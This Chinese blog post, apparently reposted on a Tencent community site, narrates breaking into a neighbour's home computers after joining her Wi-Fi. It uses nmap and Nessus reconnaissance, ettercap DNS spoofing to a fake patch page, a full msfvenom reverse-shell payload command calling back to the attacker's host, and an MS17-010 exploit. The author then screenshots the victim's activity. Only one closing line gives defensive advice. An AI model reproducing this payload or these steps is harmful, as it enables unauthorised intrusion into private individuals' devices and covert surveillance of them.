连上了你的wifi之后,我还做了什么?

0*00 前言

一直在思考,我应该写怎么样让你的青蛙变成亿万富豪,还是来一篇如何猥琐的渗透邻居小姐姐的电脑或者手机终端。

思前想后,奈何我觉得逆向破解这东西实在不适合我,还是留着那两个大佬啥时候有空来写。

0*01 信息探测

首先用外置网卡在kali内连上目标网络,查看一下本机ip

用nmap扫一下192.168.1.x c段下的目标

可以看出 除去192.168.1.1是路由器的 192.168.1.107是本机的 一共存活5台主机,其中3台为手机终端,2台为电脑终端,且都是windows系统的,我们选取两台电脑主机为目标,进一步探测。

其中192.168.1.103信息如下,从smb版本来看是一个win7

192.168.1.101那台不知为何一直没出结果,这里就不等了。不过从经验上来看估计开了防火墙和360全家桶诸如,但是没关系,我们知道它存在即可。

其中nessus扫描192.168.1.103结果如下

ms17-010,勒索病毒wannacry的本质。

0*02思路分析

一 可以尝试dns欺骗,用msf生成木马,把内网下所有流量指向我们的服务器,弹窗欺骗下载神级补丁,实际上为我们的木马。

二 又或者用beef结合msf劫持浏览器来获得shell。

三 直接拿ms17-010的exp来打win7,不过有风险,或许对方电脑会蓝屏。

0*03 dns欺骗结合msf

打开acache服务

编辑apache的index首页

vim /var/www/html/index.html

内容如下,弹出一个需要升级的补丁,实际为msf木马,我html很坑,写的简陋,凑合着用。

接下来要准备msf的木马

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.107 LPORT=4321 -f exe >tplink.exe//生成一个tcp方向连接木马 //LHOST是本机ip LPORT是端口(可自定义)

然后把木马放到我们的web根目录下

用ettercap来dns劫持

打开ettercap

选择网卡

扫描主机

选择网关

开启arp

选择工具

双击dns欺骗

开始欺骗

这样192.168.1.103这台机子在浏览器上不管访问任何网站 都会指向我们的欺骗页面。

大概是这个样子

接下里我们要在msf中设置监听,这样对方运行我们的木马的时候就能返回一个shell,当然这个木马没有免杀,可以做一些免杀的手段,我这里就不做了。

开启msf

配置msf开始监听

经过极其漫长的等待....

终于返回了shell

这时候就需要把dns欺骗撤销掉 不然她还是看不到正常的网页

让我们来看看她在干嘛

screenshot 截屏

原来是在买年货...

0*04 ms17-010

在前面的信息探测中 我们知道对方这台电脑并没有打上补丁,甚至连360都没有开启,裸机状态。

这样我们可以直接上exp

然后exploit

成功返回shell

目测这台win7是她在家里的电脑,另一台192.168.1.101的win10才是学校里的。

这里就不开她摄像头了,总得留一线,我是一个好人,为自己带盐~

0*05 总结

打开防火墙,更新补丁,不要随便运行来源不合的exe,打开不明连接。

这天气冷到我只想睡觉...

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180202G0PEO600?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券